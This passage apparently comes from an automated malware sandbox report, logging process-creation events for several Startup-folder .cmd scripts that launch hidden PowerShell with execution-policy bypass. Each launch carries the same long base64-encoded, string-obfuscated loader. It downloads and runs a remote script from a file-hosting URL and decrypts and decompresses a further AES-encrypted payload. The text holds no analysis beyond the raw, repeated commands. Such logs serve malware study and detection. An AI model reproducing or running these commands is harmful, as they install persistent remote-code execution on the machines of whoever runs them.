2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd"
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_406c4ae3.cmd"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b50e3cba.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jY